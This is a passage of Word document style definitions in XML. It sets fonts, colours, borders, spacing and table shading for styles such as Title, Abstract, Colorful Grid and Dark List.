      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="25">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="26"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="16"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="20"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="16"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="20"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      <w:spacing w:after="240" w:line="204" w:lineRule="auto"/>
      <w:ind w:left="432" w:right="432"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:kern w:val="28"/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="25"/>
    <w:qFormat/>
    <w:uiPriority w:val="19"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:kern w:val="28"/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
      <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="27">
    <w:name w:val="Abstract"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="432" w:right="1080"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080" w:themeColor="text1" w:themeTint="80"/>
      <w:kern w:val="20"/>
      <w:sz w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="50000"/>
            <w14:lumOff w14:val="50000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="28">
    <w:name w:val="55974E45905D48CEA270505FF391AEE0"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="10"/>
        <w:left w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="5"/>
        <w:bottom w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="10"/>
        <w:right w:val="single" w:color="7E97AD" w:themeColor="accent1" w:sz="4" w:space="5"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="7E97AD" w:themeFill="accent1"/>
      <w:spacing w:before="240" w:after="240" w:line="1200" w:lineRule="exact"/>
      <w:ind w:left="115" w:right="115"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="40"/>
      <w:kern w:val="28"/>
      <w:sz w:val="136"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="29">
    <w:name w:val="DE957E0256BA4EBBB07DB3DC96802DD6"/>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0">
    <w:name w:val="DB8FE0642CC342708CD714270050DCC3"/>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1">
    <w:name w:val="3F956CF29C5E490EAE3B044BEBC011BD"/>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2">
    <w:name w:val="860B0A4056A84FD193D22332A9CE8FA6"/>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3">
    <w:name w:val="00AE6F94CC374FC69D3F8B1421A0AFCA"/>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4">
    <w:name w:val="0E433CB308244F39A7723DE156B7990B"/>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5">
    <w:name w:val="A8272018F39E4CD9A03F40C2F29788F4"/>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6">
    <w:name w:val="5DEA62D16AC6422E937A8777371C9370"/>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7">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C"/>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8">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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
    <w:name w:val="A218B64594EF4F23B56A76968126AE7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
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F"/>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
    <w:name w:val="F6854632AAAA46AB8097879A124295D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
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF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
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9"/>
    <w:qFormat/>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
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D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
    <w:name w:val="FEC0977598A343FB83EB31C89803F96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
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA8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8">
    <w:name w:val="19C492744CD04767AD335F13593D986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
    <w:name w:val="9979C8729CB544D3A7B3D4580D0110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
    <w:name w:val="D3EFC4412A184A048F418229630F803C"/>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
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A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
    <w:name w:val="79A87265940A4E53873725400795B7CC"/>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
    <w:name w:val="E97057898B1D40DD81476210C44AD2A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
    <w:name w:val="8791A301A35E463D8850C93BBF9164F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
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E9309"/>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
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE88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
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D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
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA"/>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
    <w:name w:val="B05E969606664CCC84D6FDC3B88A2E9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
    <w:name w:val="5DEA62D16AC6422E937A8777371C93701"/>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1">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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62">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="63"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="120" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="Body Text Indent 3 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="62"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="20"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1">
            <w14:lumMod w14:val="65000"/>
            <w14:lumOff w14:val="35000"/>
          </w14:schemeClr>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="64">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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65">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="6"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="33"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="66">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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72">
    <w:name w:val="Colorful Grid Accent 2"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="73"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>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F4E8DF" w:themeFill="accent2" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAD1BF" w:themeFill="accent2" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAD1BF" w:themeFill="accent2" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AA6736" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="AA6736" w:themeFill="accent2" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E5C6AF" w:themeFill="accent2" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="73">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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74">
    <w:name w:val="Colorful Grid Accent 3"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="73"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>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5E0DE" w:themeFill="accent3" w:themeFillTint="33"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBC2BD" w:themeFill="accent3" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="tx1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CBC2BD" w:themeFill="accent3" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5B4F47" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w14:textFill>
          <w14:solidFill>
            <w14:schemeClr w14:val="bg1"/>
          </w14:solidFill>
        </w14:textFill>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="5B4F47" w:themeFill="accent3" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BEB4AD" w:themeFill="accent3" w:themeFillTint="7F"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="75">
    <w:name w:val="FEC0977598A343FB83EB31C89803F968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
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA81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
    <w:name w:val="19C492744CD04767AD335F13593D9864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
    <w:name w:val="9979C8729CB544D3A7B3D4580D01102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
    <w:name w:val="D3EFC4412A184A048F418229630F803C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
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A8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
    <w:name w:val="79A87265940A4E53873725400795B7CC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
    <w:name w:val="E97057898B1D40DD81476210C44AD2A4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
    <w:name w:val="8791A301A35E463D8850C93BBF9164F8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
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E9309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5">
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE889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
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D1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
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA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
    <w:name w:val="B05E969606664CCC84D6FDC3B88A2E95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9">
    <w:name w:val="5DEA62D16AC6422E937A8777371C93702"/>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90">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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styleId="91">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="6"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="92">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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93">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="94"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="160" w:line="240"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character" w:customStyle="1" w:styleId="94">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="93"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>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95">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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6">
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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7">
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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8">
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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9">
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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0">
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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01">
    <w:name w:val="Dark List Accent 4"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="70"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="B4936D" w:themeFill="accent4"/>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5F4930" w:themeFill="accent4" w:themeFillShade="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="18" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="18" w:space="0"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="8F6E49" w:themeFill="accent4" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="102">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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03">
    <w:name w:val="Dark List Accent 6"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="70"/>
    <w:pPr>
      <w:spacing w:before="40" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="bg1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
    <w:tblPr>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="9D936F" w:themeFill="accent6"/>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4F4936" w:themeFill="accent6" w:themeFillShade="7F"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="18" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="single" w:color="FFFFFF" w:themeColor="background1" w:sz="18" w:space="0"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="776F51" w:themeFill="accent6" w:themeFillShade="BF"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="104">
    <w:name w:val="FEC0977598A343FB83EB31C89803F968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5">
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA812"/>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06">
    <w:name w:val="19C492744CD04767AD335F13593D9864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7">
    <w:name w:val="9979C8729CB544D3A7B3D4580D01102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8">
    <w:name w:val="D3EFC4412A184A048F418229630F803C2"/>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9">
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A8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0">
    <w:name w:val="79A87265940A4E53873725400795B7CC2"/>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1">
    <w:name w:val="E97057898B1D40DD81476210C44AD2A42"/>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2">
    <w:name w:val="256D5F248F9843ABB5EA74CBF964E814"/>
    <w:qFormat/>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13">
    <w:name w:val="D32B4272A6EF4B01A430619F5808052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14">
    <w:name w:val="8791A301A35E463D8850C93BBF9164F8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5">
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E9309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6">
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE889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7">
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D1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8">
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA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9">
    <w:name w:val="5DEA62D16AC6422E937A8777371C93703"/>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120">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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121">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="122">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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123">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:uiPriority w:val="18"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="3A4C5B" w:themeColor="accent1" w:themeShade="80"/>
      <w:kern w:val="20"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="124">
    <w:name w:val="A218B64594EF4F23B56A76968126AE74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5">
    <w:name w:val="FCACD00627B3430BB5CB58EF4600076F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6">
    <w:name w:val="F6854632AAAA46AB8097879A124295D5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7">
    <w:name w:val="A501E0E1225047A5B50D018BF35ADAF8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8">
    <w:name w:val="5ECF4EE936C74201AD5935A4F57DB34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9">
    <w:name w:val="68A89D3299B44E1FA45AE56B6F66D6C9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styleId="130">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="6"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="131">
    <w:name w:val="E7CA190A1A364E5894DB7323BAEA5D26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styleId="132">
    <w:name w:val="HTML Definition"/>
    <w:basedOn w:val="6"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="133">
    <w:name w:val="FEC0977598A343FB83EB31C89803F968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4">
    <w:name w:val="41A52E6CC3BE4949A71B65C8E871BA813"/>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35">
    <w:name w:val="19C492744CD04767AD335F13593D9864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6">
    <w:name w:val="9979C8729CB544D3A7B3D4580D01102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7">
    <w:name w:val="D3EFC4412A184A048F418229630F803C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8">
    <w:name w:val="2D337D0626914617BCBCB5B23968F2A8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9">
    <w:name w:val="79A87265940A4E53873725400795B7CC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0">
    <w:name w:val="E97057898B1D40DD81476210C44AD2A4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1">
    <w:name w:val="256D5F248F9843ABB5EA74CBF964E814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42">
    <w:name w:val="D32B4272A6EF4B01A430619F58080523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43">
    <w:name w:val="8791A301A35E463D8850C93BBF9164F8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4">
    <w:name w:val="C6FB9B6F408A4E0A9597FBFFAF9E9309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5">
    <w:name w:val="2EA0DC5420504DAE8273F1CE0FEBE889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6">
    <w:name w:val="9BC6F46848AF49E988559BC01BBF8D1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7">
    <w:name w:val="A8DEB0FC71F2449C96A718E9CF8135AA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8">
    <w:name w:val="B05E969606664CCC84D6FDC3B88A2E95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9">
    <w:name w:val="5DEA62D16AC6422E937A8777371C93704"/>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150">
    <w:name w:val="7DA331C4651141A79F4D5AF832ABD05C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151">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="6"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="7E97AD" w:themeColor="accent1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="accent1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="152">
    <w:name w:val="8C28D5823AF7477A9BC27AF476E1C4B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3">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="154"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="30"/>
